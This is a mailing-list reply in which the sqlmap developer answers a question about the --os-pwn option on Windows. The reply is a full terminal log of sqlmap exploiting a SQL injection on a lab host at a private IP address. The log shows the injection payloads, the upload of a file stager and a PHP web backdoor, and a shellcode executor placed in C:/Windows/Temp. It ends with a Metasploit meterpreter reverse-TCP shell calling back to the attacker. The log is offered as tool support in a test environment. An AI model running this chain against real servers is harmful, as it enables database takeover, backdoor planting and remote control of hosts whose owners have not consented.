Re: [sqlmap-users] mysql os-pwn options on windows

[Miroslav S. <mir...@gm...>]

$ sudo python sqlmap.py -u "
http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
[sudo] password for stamparm:
         _
 ___ ___| |_____ ___ ___  {1.0.4.21#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 09:11:45

[09:11:45] [WARNING] you did not provide the local path where Metasploit
Framework is installed
[09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
installation inside the environment path(s)
[09:11:45] [INFO] Metasploit Framework has been found installed in the
'/usr/bin' path
[09:11:45] [INFO] resuming back-end DBMS 'mysql'
[09:11:45] [INFO] testing connection to the target URL
[09:11:45] [INFO] heuristics detected web page charset 'ascii'
[09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2546=2546

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
    Payload: id=1 AND (SELECT 8079 FROM(SELECT
COUNT(*),CONCAT(0x7178767071,(SELECT
(ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT
NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
epjZ
---
[09:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[09:11:45] [INFO] fingerprinting the back-end DBMS operating system
[09:11:45] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[09:11:46] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[09:11:47] [WARNING] unable to retrieve automatically the web server
document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[09:12:02] [WARNING] unable to automatically parse any web server path
[09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
LIMIT 'LINES TERMINATED BY' method
[09:12:02] [INFO] the file stager has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
[09:12:02] [INFO] the backdoor has been successfully uploaded on
'/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
[09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
>
what is the local address? [Enter for '192.168.146.1' (detected)]
which local port number do you want to use? [59643]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[09:12:04] [INFO] creation in progress ..... done
[09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe'
[09:12:09] [INFO] shellcodeexec successfully uploaded
[09:12:09] [INFO] running Metasploit Framework command line interface
locally, please wait..

 ______________________________________________________________________________
|
   |
|                   METASPLOIT CYBER MISSILE COMMAND V4
   |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /
 x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __
 ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \
 ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH
FFFFFFFF #
################################################################################

http://metasploit.pro


       =[ metasploit v4.11.8-dev-a030179                  ]
+ -- --=[ 1527 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 59643
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:59643
[*] Starting the payload handler...
[09:12:18] [INFO] running Metasploit Framework shellcode remotely via
shellcodeexec, please wait..
[09:12:23] [WARNING] turning off pre-connect mechanism because of
connection time out(s)
[*] Sending stage (957487 bytes) to 192.168.146.132

meterpreter >


On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
wrote:

> hi all,
>
> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
> windows machine"
>
> i got an error
>
> [WARNING] unable to upload the file through the web file stager to '/tmp'
>
> i wonder is it only avaliable for linux OS ?
>
> thanks
> Indra Z
>
> --
> --from the net with zero space--
>
>
> ------------------------------------------------------------------------------
> Find and fix application performance issues faster with Applications
> Manager
> Applications Manager provides deep performance insights into multiple
> tiers of
> your business applications. It resolves application problems quickly and
> reduces your MTTR. Get your free trial!
> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm